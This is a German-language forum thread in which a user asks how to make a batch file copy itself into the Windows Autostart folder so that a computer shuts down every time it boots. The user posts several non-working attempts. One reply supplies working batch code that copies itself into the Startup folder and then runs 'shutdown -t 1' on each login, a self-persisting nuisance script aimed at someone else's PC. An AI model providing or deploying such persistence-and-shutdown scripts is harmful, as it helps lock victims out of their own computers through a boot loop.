Batch Datei den Befehl geben sich selbst in Autostart Ordner zu kopieren?!?!?!?!

New member
Hallo Liebe PCMasters Mitglieder,

Ich bin hier seit einigen Minuten registriert deswegen möchte euch allen jetzt Hallo sagen^^ aber das ist nicht mein Thread!^^ Ich habe folgendes Problem:

Ich versuche schon seit einigen Stunden eine Batch Datei zu schreiben die sich Automatisch in den Autostart Ordner kopiert, also wenn jemand sein PC hoch fährt er sich wieder runterfährt^^
Jedoch finde/habe ich nicht den richtigen Code/Befehl dafür.
Ich habe schon haufen weise zeug ausprobiert doch keins hat geklappt b.s.w. das:

1.
@echo off
echo "SHUTDOWN -r - t 60" >> c:\terminate.log
rem SHUTDOWN -r -t 60" >> c:\terminate.log
shortcut /f:"%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\terminate.lnk /r:7 /a:c /t:C:\terminate.bat

2.
@echo off
xcopy hello.bat "%userprofile%\Startmen \Programme\Autostart" /Y > nul
del hello.bat
3.
@echo off
move lustig.bat "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"


und noch vieles anderes jedoch hat keins geklappt!!

Ich habe Windows Vista Home Premium fals euch das hilft!

Ich wäre froh wenn ihr mir helfen könntet.

mfg loool09
 
Hast du mal den Absoluten Pfad angegeben? Also ohne Systemvariablen?

Vielleicht liegt es auch an den evtl. fehlenden Adminstratorrechten..
 
Code:
@echo off
chcp 1252
if not "%~f0"=="%USERPROFILE%\Startmenü\Programme\Autostart\%~n0%~x0" copy "%~f0" "%userprofile%\Startmenü\Programme\Autostart\"
if "%~f0"=="%USERPROFILE%\Startmenü\Programme\Autostart\%~n0%~x0" shutdown -t 1


hier, aber naja ...
lame :p
 
Zuletzt bearbeitet:

Online-Statistiken

Zurzeit aktive Mitglieder
0
Zurzeit aktive Gäste
209
Besucher gesamt
209

Beliebte Forum-Themen

X
Keine passende Antwort gefunden?